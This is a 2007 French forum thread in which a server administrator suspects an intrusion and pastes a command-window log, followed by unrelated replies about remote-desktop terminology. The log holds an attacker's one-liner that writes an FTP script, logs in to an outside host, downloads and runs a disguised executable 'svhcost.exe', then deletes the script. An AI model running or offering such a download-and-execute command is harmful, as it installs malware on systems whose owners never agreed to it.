Intrusions extérieure.

Maeva67
Bonjour,

Je viens de me connecter via VNC sur un serveur dont j'assure la gestion et
je suis étonnée de voir qu'une fenetre de commande était ouverte avec le
texte qui suit.

Aucune des personnes ayant accès à ce serveur n'est assez pointu en
informatique pour effectuer ce genre d'action, ce qui m'amène à soupçonner
une intrusion extérieure.

Qu'a-t-il essayé, voire réussi, à faire? J'ai changé le mot de passe de la
session Windows, y a-t-il un risque qu'il puisse trouver le nouveau mot de
passe?

Comment a-t-il faut pour trouver le mot de passe VNC?

Merci

<<<<

C:\WINDOWS\system32>del eq&echo open 0.0.0.0 18352 >> eq&echo user 14963
26811 >
> eq &echo get svhcost.exe >> eq &echo quit >> eq &ftp -n -s:eq &svhcost.exe
> &de
l eq
Impossible de trouver C:\WINDOWS\system32\eq
ftp> open 0.0.0.0 18352
> ftp : connect :Impossible d'attribuer l'adresse demande
ftp> user 14963 26811
Non connect.
ftp> get svhcost.exe
Non connect.
ftp> quit
'svhcost.exe' n'est pas reconnu en tant que commande interne
ou externe, un programme excutable ou un fichier de commandes.

Nina Popravka
On Sun, 07 Oct 2007 18:24:56 +0200, F. Dunoyer [MVP]
~.net> wrote:

Si ça peut te rassurer RDC ça ne me parle pas non plus :)

Remote Desktop Connection ?
Allons allons...
(rassure-toi, je connais aussi TSE et RDP)
:-)
--
Nina

F. Dunoyer [MVP]
Nina Popravka avait soumis l'idée :
~.net> wrote:

Si ça peut te rassurer RDC ça ne me parle pas non plus :)

Remote Desktop Connection ?
Allons allons...
(rassure-toi, je connais aussi TSE et RDP)
:-)

Désolé, ce n'etait pas une critique !
Juste un probleme de langue d'utilisation du système et d'habitudes.
Quand je veux faire bref, je parle de connexion TSE ou de client RDP
meme si c'est surement des raccourcis incorrects,
sinon en effet, je vais parler de Connexion au Bureau à Distance parce
que c'est ce que je trouve dans les menus d'un système français.

C'est en effet strictement la même chose :)

Jours après jours avec Longhorn Server
http://fds.mvps.org/LH/index.htm

1 2